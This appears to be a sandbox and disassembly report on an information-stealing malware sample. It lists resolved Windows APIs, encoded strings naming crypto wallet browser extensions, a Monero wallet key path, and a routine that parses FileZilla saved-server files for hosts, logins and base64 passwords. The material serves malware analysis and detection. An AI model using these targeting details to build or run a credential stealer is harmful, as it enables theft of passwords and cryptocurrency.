Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: 3b104418ed23a88f278c9190885dae5ada6a942efacc219e696f91324f4d00fb
Instruction ID: c73e2804039228ea8ea2ae4b294924a127fd9cfc15b0f3ba4c4ae5a40ff9081a
Opcode Fuzzy Hash: 3b104418ed23a88f278c9190885dae5ada6a942efacc219e696f91324f4d00fb
Instruction Fuzzy Hash: CCD017749042089BCB009BA0984A6ADBB78EB08211F000555D90572280EA70A8918AA6

Function 00939C10 Relevance: 228.2, APIs: 112, Strings: 18, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,006E4E80), ref: 00939C2D
GetProcAddress.KERNEL32(75900000,006E4EA0), ref: 00939C45
GetProcAddress.KERNEL32(75900000,006F9590), ref: 00939C5E
GetProcAddress.KERNEL32(75900000,006F9608), ref: 00939C76
GetProcAddress.KERNEL32(75900000,006FD5D0), ref: 00939C8E
GetProcAddress.KERNEL32(75900000,006FD5A0), ref: 00939CA7
GetProcAddress.KERNEL32(75900000,006EBB60), ref: 00939CBF
GetProcAddress.KERNEL32(75900000,006FD4F8), ref: 00939CD7
GetProcAddress.KERNEL32(75900000,006FD468), ref: 00939CF0
GetProcAddress.KERNEL32(75900000,006FD5E8), ref: 00939D08
GetProcAddress.KERNEL32(75900000,006FD498), ref: 00939D20
GetProcAddress.KERNEL32(75900000,006E4EC0), ref: 00939D39
GetProcAddress.KERNEL32(75900000,006E4F00), ref: 00939D51
GetProcAddress.KERNEL32(75900000,006E4F60), ref: 00939D69
GetProcAddress.KERNEL32(75900000,006E4FA0), ref: 00939D82
GetProcAddress.KERNEL32(75900000,006FD540), ref: 00939D9A
GetProcAddress.KERNEL32(75900000,006FD528), ref: 00939DB2
GetProcAddress.KERNEL32(75900000,006EBB88), ref: 00939DCB
GetProcAddress.KERNEL32(75900000,006E5000), ref: 00939DE3
GetProcAddress.KERNEL32(75900000,006FD618), ref: 00939DFB
GetProcAddress.KERNEL32(75900000,006FD5B8), ref: 00939E14
GetProcAddress.KERNEL32(75900000,006FD600), ref: 00939E2C
GetProcAddress.KERNEL32(75900000,006FD4E0), ref: 00939E44
GetProcAddress.KERNEL32(75900000,006E5100), ref: 00939E5D
GetProcAddress.KERNEL32(75900000,006FD558), ref: 00939E75
GetProcAddress.KERNEL32(75900000,006FD588), ref: 00939E8D
GetProcAddress.KERNEL32(75900000,006FD4C8), ref: 00939EA6
GetProcAddress.KERNEL32(75900000,006FD480), ref: 00939EBE
GetProcAddress.KERNEL32(75900000,006FD4B0), ref: 00939ED6
GetProcAddress.KERNEL32(75900000,006FD510), ref: 00939EEF
GetProcAddress.KERNEL32(75900000,006FD570), ref: 00939F07
GetProcAddress.KERNEL32(75900000,006FCF28), ref: 00939F1F
GetProcAddress.KERNEL32(75900000,006FD078), ref: 00939F38
GetProcAddress.KERNEL32(75900000,006FA880), ref: 00939F50
GetProcAddress.KERNEL32(75900000,006FCFA0), ref: 00939F68
GetProcAddress.KERNEL32(75900000,006FD018), ref: 00939F81
GetProcAddress.KERNEL32(75900000,006E5020), ref: 00939F99
GetProcAddress.KERNEL32(75900000,006FD120), ref: 00939FB1
GetProcAddress.KERNEL32(75900000,006E5080), ref: 00939FCA
GetProcAddress.KERNEL32(75900000,006FD108), ref: 00939FE2
GetProcAddress.KERNEL32(75900000,006FCFD0), ref: 00939FFA
GetProcAddress.KERNEL32(75900000,006E50A0), ref: 0093A013
GetProcAddress.KERNEL32(75900000,006E50C0), ref: 0093A02B
LoadLibraryA.KERNEL32(006FCFE8,?,00935CA3,00940AEB,?,?,?,?,?,?,?,?,?,?,00940AEA,00940AE3), ref: 0093A03D
LoadLibraryA.KERNEL32(006FD030,?,00935CA3,00940AEB,?,?,?,?,?,?,?,?,?,?,00940AEA,00940AE3), ref: 0093A04E
LoadLibraryA.KERNEL32(006FD000,?,00935CA3,00940AEB,?,?,?,?,?,?,?,?,?,?,00940AEA,00940AE3), ref: 0093A060
LoadLibraryA.KERNEL32(006FCEB0,?,00935CA3,00940AEB,?,?,?,?,?,?,?,?,?,?,00940AEA,00940AE3), ref: 0093A072
LoadLibraryA.KERNEL32(006FCE98,?,00935CA3,00940AEB,?,?,?,?,?,?,?,?,?,?,00940AEA,00940AE3), ref: 0093A083
LoadLibraryA.KERNEL32(006FD060,?,00935CA3,00940AEB,?,?,?,?,?,?,?,?,?,?,00940AEA,00940AE3), ref: 0093A095
LoadLibraryA.KERNEL32(006FCF88,?,00935CA3,00940AEB,?,?,?,?,?,?,?,?,?,?,00940AEA,00940AE3), ref: 0093A0A7
LoadLibraryA.KERNEL32(006FCE80,?,00935CA3,00940AEB,?,?,?,?,?,?,?,?,?,?,00940AEA,00940AE3), ref: 0093A0B8
GetProcAddress.KERNEL32(75FD0000,006E54E0), ref: 0093A0DA
GetProcAddress.KERNEL32(75FD0000,006FD090), ref: 0093A0F2
GetProcAddress.KERNEL32(75FD0000,006F9038), ref: 0093A10A
GetProcAddress.KERNEL32(75FD0000,006FCF70), ref: 0093A123
GetProcAddress.KERNEL32(75FD0000,006E51E0), ref: 0093A13B
GetProcAddress.KERNEL32(734B0000,006EB6B0), ref: 0093A160
GetProcAddress.KERNEL32(734B0000,006E5540), ref: 0093A179
GetProcAddress.KERNEL32(734B0000,006EB9D0), ref: 0093A191
GetProcAddress.KERNEL32(734B0000,006FCFB8), ref: 0093A1A9
GetProcAddress.KERNEL32(734B0000,006FCEC8), ref: 0093A1C2
GetProcAddress.KERNEL32(734B0000,006E5380), ref: 0093A1DA
GetProcAddress.KERNEL32(734B0000,006E5500), ref: 0093A1F2
GetProcAddress.KERNEL32(734B0000,006FCEE0), ref: 0093A20B
GetProcAddress.KERNEL32(763B0000,006E51C0), ref: 0093A22C
GetProcAddress.KERNEL32(763B0000,006E5320), ref: 0093A244
GetProcAddress.KERNEL32(763B0000,006FCF40), ref: 0093A25D
GetProcAddress.KERNEL32(763B0000,006FD138), ref: 0093A275
GetProcAddress.KERNEL32(763B0000,006E5520), ref: 0093A28D
GetProcAddress.KERNEL32(750F0000,006EB598), ref: 0093A2B3
GetProcAddress.KERNEL32(750F0000,006EB890), ref: 0093A2CB
GetProcAddress.KERNEL32(750F0000,006FD0C0), ref: 0093A2E3
GetProcAddress.KERNEL32(750F0000,006E5460), ref: 0093A2FC
GetProcAddress.KERNEL32(750F0000,006E5200), ref: 0093A314
GetProcAddress.KERNEL32(750F0000,006EB610), ref: 0093A32C
GetProcAddress.KERNEL32(75A50000,006FCE68), ref: 0093A352
GetProcAddress.KERNEL32(75A50000,006E5360), ref: 0093A36A
GetProcAddress.KERNEL32(75A50000,006F8F68), ref: 0093A382
GetProcAddress.KERNEL32(75A50000,006FD048), ref: 0093A39B
GetProcAddress.KERNEL32(75A50000,006FD0A8), ref: 0093A3B3
GetProcAddress.KERNEL32(75A50000,006E5340), ref: 0093A3CB
GetProcAddress.KERNEL32(75A50000,006E53A0), ref: 0093A3E4
GetProcAddress.KERNEL32(75A50000,006FCEF8), ref: 0093A3FC
GetProcAddress.KERNEL32(75A50000,006FD0D8), ref: 0093A414
GetProcAddress.KERNEL32(75070000,006E5220), ref: 0093A436
GetProcAddress.KERNEL32(75070000,006FCF10), ref: 0093A44E
GetProcAddress.KERNEL32(75070000,006FD150), ref: 0093A466
GetProcAddress.KERNEL32(75070000,006FD0F0), ref: 0093A47F
GetProcAddress.KERNEL32(75070000,006FCF58), ref: 0093A497
GetProcAddress.KERNEL32(74E50000,006E5240), ref: 0093A4B8
GetProcAddress.KERNEL32(74E50000,006E5280), ref: 0093A4D1
GetProcAddress.KERNEL32(75320000,006E5400), ref: 0093A4F2
GetProcAddress.KERNEL32(75320000,006FD3F0), ref: 0093A50A
GetProcAddress.KERNEL32(6F030000,006E5300), ref: 0093A530
GetProcAddress.KERNEL32(6F030000,006E53C0), ref: 0093A548
GetProcAddress.KERNEL32(6F030000,006E5260), ref: 0093A560
GetProcAddress.KERNEL32(6F030000,006FD330), ref: 0093A579
GetProcAddress.KERNEL32(6F030000,006E5440), ref: 0093A591
GetProcAddress.KERNEL32(6F030000,006E53E0), ref: 0093A5A9
GetProcAddress.KERNEL32(6F030000,006E5420), ref: 0093A5C2
GetProcAddress.KERNEL32(6F030000,006E5480), ref: 0093A5DA
GetProcAddress.KERNEL32(6F030000,InternetSetOptionA), ref: 0093A5F1
GetProcAddress.KERNEL32(6F030000,HttpQueryInfoA), ref: 0093A607
GetProcAddress.KERNEL32(74E00000,006FD408), ref: 0093A629
GetProcAddress.KERNEL32(74E00000,006F8F78), ref: 0093A641
GetProcAddress.KERNEL32(74E00000,006FD348), ref: 0093A659
GetProcAddress.KERNEL32(74E00000,006FD390), ref: 0093A672
GetProcAddress.KERNEL32(74DF0000,006E52A0), ref: 0093A693
GetProcAddress.KERNEL32(6F9C0000,006FD3D8), ref: 0093A6B4
GetProcAddress.KERNEL32(6F9C0000,006E52C0), ref: 0093A6CD
GetProcAddress.KERNEL32(6F9C0000,006FD378), ref: 0093A6E5
GetProcAddress.KERNEL32(6F9C0000,006FD1B0), ref: 0093A6FD

Strings

@Sn, xrefs: 0093A3BE
Sn, xrefs: 0093A59C
Un, xrefs: 0093A280
`On, xrefs: 00939D5C
Pn, xrefs: 00939F8C
`Rn, xrefs: 0093A553
`Sn, xrefs: 0093A35D
Rn, xrefs: 0093A428
`Tn, xrefs: 0093A2EE
Qn, xrefs: 0093A12E
Tn, xrefs: 0093A0CC
@Tn, xrefs: 0093A584
@Rn, xrefs: 0093A4AB
InternetSetOptionA, xrefs: 0093A5E5
Sn, xrefs: 0093A237
HttpQueryInfoA, xrefs: 0093A5FC
Tn, xrefs: 0093A5B4
@Un, xrefs: 0093A16B

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: Pn$ Rn$ Sn$ Tn$ Un$@Rn$@Sn$@Tn$@Un$HttpQueryInfoA$InternetSetOptionA$`On$`Rn$`Sn$`Tn$Qn$Sn$Tn
API String ID: 2238633743-2367308985
Opcode ID: 2b991a9e20a4cbdf5f25a46b34851a6a8286159a4e01d3f7307409b13a0f92be
Instruction ID: f03561ed58fe73676b65da3d43970b461af45e5b9dc6c4c5de39d2c52016a8b7
Opcode Fuzzy Hash: 2b991a9e20a4cbdf5f25a46b34851a6a8286159a4e01d3f7307409b13a0f92be
Instruction Fuzzy Hash: 4A621DB5510200AFCB44DFA8EE989663BF9F78C701714851AE609E32E4DEBDA841DF53

Function 00927710 Relevance: 100.3, APIs: 54, Strings: 3, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,wcGhmY2NlbWNpZ25oaWZwamthcGZiaWhkfDF8MHwwfFNhZmVQYWx8bGdtcGNwZ2xwbmdkb2FsYmdlb2xkZWFqZmNsbmhhZmF8MXwwfDB8U3ViV2FsbGV0IC0gUG9sa2Fkb3QgV2FsbGV0fG9uaG9nZmplYWNuZm9vZmtmZ3BwZGxibWxtbnB), ref: 00927724
RtlAllocateHeap.NTDLL(00000000), ref: 0092772B
lstrcat.KERNEL32(?,006F9E40), ref: 009278DB
lstrcat.KERNEL32(?,?), ref: 009278EF
lstrcat.KERNEL32(?,?), ref: 00927903
lstrcat.KERNEL32(?,?), ref: 00927917
lstrcat.KERNEL32(?,006FE1A8), ref: 0092792B
lstrcat.KERNEL32(?,006FE0E8), ref: 0092793F
lstrcat.KERNEL32(?,006FE238), ref: 00927952
lstrcat.KERNEL32(?,006FDF68), ref: 00927966
lstrcat.KERNEL32(?,006E8BF8), ref: 0092797A
lstrcat.KERNEL32(?,?), ref: 0092798E
lstrcat.KERNEL32(?,?), ref: 009279A2
lstrcat.KERNEL32(?,?), ref: 009279B6
lstrcat.KERNEL32(?,006FE1A8), ref: 009279C9
lstrcat.KERNEL32(?,006FE0E8), ref: 009279DD
lstrcat.KERNEL32(?,006FE238), ref: 009279F1
lstrcat.KERNEL32(?,006FDF68), ref: 00927A04
lstrcat.KERNEL32(?,006E8B28), ref: 00927A18
lstrcat.KERNEL32(?,?), ref: 00927A2C
lstrcat.KERNEL32(?,?), ref: 00927A40
lstrcat.KERNEL32(?,?), ref: 00927A54
lstrcat.KERNEL32(?,006FE1A8), ref: 00927A68
lstrcat.KERNEL32(?,006FE0E8), ref: 00927A7B
lstrcat.KERNEL32(?,006FE238), ref: 00927A8F
lstrcat.KERNEL32(?,006FDF68), ref: 00927AA3
lstrcat.KERNEL32(?,006E8C60), ref: 00927AB6
lstrcat.KERNEL32(?,?), ref: 00927ACA
lstrcat.KERNEL32(?,?), ref: 00927ADE
lstrcat.KERNEL32(?,?), ref: 00927AF2
lstrcat.KERNEL32(?,006FE1A8), ref: 00927B06
lstrcat.KERNEL32(?,006FE0E8), ref: 00927B1A
lstrcat.KERNEL32(?,006FE238), ref: 00927B2D
lstrcat.KERNEL32(?,006FDF68), ref: 00927B41
lstrcat.KERNEL32(?,006E8988), ref: 00927B55
lstrcat.KERNEL32(?,?), ref: 00927B69
lstrcat.KERNEL32(?,?), ref: 00927B7D
lstrcat.KERNEL32(?,?), ref: 00927B91
lstrcat.KERNEL32(?,006FE1A8), ref: 00927BA4
lstrcat.KERNEL32(?,006FE0E8), ref: 00927BB8
lstrcat.KERNEL32(?,006FE238), ref: 00927BCC
lstrcat.KERNEL32(?,006FDF68), ref: 00927BDF
lstrcat.KERNEL32(?,006E87E8), ref: 00927BF3
lstrcat.KERNEL32(?,?), ref: 00927C07
lstrcat.KERNEL32(?,?), ref: 00927C1B
lstrcat.KERNEL32(?,?), ref: 00927C2F
lstrcat.KERNEL32(?,006FE1A8), ref: 00927C43
lstrcat.KERNEL32(?,006FE0E8), ref: 00927C56
lstrcat.KERNEL32(?,006FE238), ref: 00927C6A
lstrcat.KERNEL32(?,006FDF68), ref: 00927C7E

Part of subcall function 009275D0: lstrcat.KERNEL32(3567D020,009417FC), ref: 00927606
Part of subcall function 009275D0: lstrcat.KERNEL32(3567D020,00000000), ref: 00927648
Part of subcall function 009275D0: lstrcat.KERNEL32(3567D020, : ), ref: 0092765A
Part of subcall function 009275D0: lstrcat.KERNEL32(3567D020,00000000), ref: 0092768F
Part of subcall function 009275D0: lstrcat.KERNEL32(3567D020,00941804), ref: 009276A0
Part of subcall function 009275D0: lstrcat.KERNEL32(3567D020,00000000), ref: 009276D3
Part of subcall function 009275D0: lstrcat.KERNEL32(3567D020,00941808), ref: 009276ED
Part of subcall function 009275D0: task.LIBCPMTD ref: 009276FB

lstrcat.KERNEL32(?,006FEA18), ref: 00927E0B
lstrcat.KERNEL32(?,006FDD10), ref: 00927E1E
lstrlen.KERNEL32(3567D020), ref: 00927E2B
lstrlen.KERNEL32(3567D020), ref: 00927E3B

Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788

Strings

8o, xrefs: 00927945, 009279E3, 00927A81, 00927B20, 00927BBE, 00927C5C
wcGhmY2NlbWNpZ25oaWZwamthcGZiaWhkfDF8MHwwfFNhZmVQYWx8bGdtcGNwZ2xwbmdkb2FsYmdlb2xkZWFqZmNsbmhhZmF8MXwwfDB8U3ViV2FsbGV0IC0gUG9sa2Fkb3QgV2FsbGV0fG9uaG9nZmplYWNuZm9vZmtmZ3BwZGxibWxtbnB, xrefs: 0092771D
o, xrefs: 00927931, 009279CF, 00927A6E, 00927B0C, 00927BAA, 00927C49

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
String ID: 8o$wcGhmY2NlbWNpZ25oaWZwamthcGZiaWhkfDF8MHwwfFNhZmVQYWx8bGdtcGNwZ2xwbmdkb2FsYmdlb2xkZWFqZmNsbmhhZmF8MXwwfDB8U3ViV2FsbGV0IC0gUG9sa2Fkb3QgV2FsbGV0fG9uaG9nZmplYWNuZm9vZmtmZ3BwZGxibWxtbnB$o
API String ID: 928082926-1328578933
Opcode ID: e0c02c1ef5a30607557af5345bc6aac0577cbeb34d734be7a78536315915b952
Instruction ID: 6d4e9191fe1478efd66bd79d6d0667be1b0c1ad93d4894c5d76ed8aed2759a26
Opcode Fuzzy Hash: e0c02c1ef5a30607557af5345bc6aac0577cbeb34d734be7a78536315915b952
Instruction Fuzzy Hash: 2C32DEB6910314ABCB15EBA0DC85EEE737DBB44700F444A98F219B3190EEB9E7858F51

Function 00930250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788

Part of subcall function 00938DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00938E0B

Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982

Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905

Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,006F9228,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12

Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6

Part of subcall function 009299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009299EC
Part of subcall function 009299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00929A11
Part of subcall function 009299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00929A31
Part of subcall function 009299C0: ReadFile.KERNEL32(000000FF,?,00000000,0092148F,00000000), ref: 00929A5A
Part of subcall function 009299C0: LocalFree.KERNEL32(0092148F), ref: 00929A90
Part of subcall function 009299C0: CloseHandle.KERNEL32(000000FF), ref: 00929A9A

Part of subcall function 00938E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00938E52

GetProcessHeap.KERNEL32(00000000,000F423F,00940DBA,00940DB7,00940DB6,00940DB3), ref: 00930362
RtlAllocateHeap.NTDLL(00000000), ref: 00930369
StrStrA.SHLWAPI(00000000,<Host>), ref: 00930385
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00940DB2), ref: 00930393
StrStrA.SHLWAPI(00000000,<Port>), ref: 009303CF
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00940DB2), ref: 009303DD
StrStrA.SHLWAPI(00000000,<User>), ref: 00930419
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00940DB2), ref: 00930427
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00930463
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00940DB2), ref: 00930475
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00940DB2), ref: 00930502
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00940DB2), ref: 0093051A
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00940DB2), ref: 00930532
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00940DB2), ref: 0093054A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 00930562
lstrcat.KERNEL32(?,profile: null), ref: 00930571
lstrcat.KERNEL32(?,url: ), ref: 00930580
lstrcat.KERNEL32(?,00000000), ref: 00930593
lstrcat.KERNEL32(?,00941678), ref: 009305A2
lstrcat.KERNEL32(?,00000000), ref: 009305B5
lstrcat.KERNEL32(?,0094167C), ref: 009305C4
lstrcat.KERNEL32(?,login: ), ref: 009305D3
lstrcat.KERNEL32(?,00000000), ref: 009305E6
lstrcat.KERNEL32(?,00941688), ref: 009305F5
lstrcat.KERNEL32(?,password: ), ref: 00930604
lstrcat.KERNEL32(?,00000000), ref: 00930617
lstrcat.KERNEL32(?,00941698), ref: 00930626
lstrcat.KERNEL32(?,0094169C), ref: 00930635
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00940DB2), ref: 0093068E

Strings

password: , xrefs: 009305FB
profile: null, xrefs: 00930568
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 009302A4
browser: FileZilla, xrefs: 00930559
url: , xrefs: 00930577
login: , xrefs: 009305CA
<Pass encoding="base64">, xrefs: 0093045A
<Port>, xrefs: 009303C6
<User>, xrefs: 00930410
<Host>, xrefs: 0093037C

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
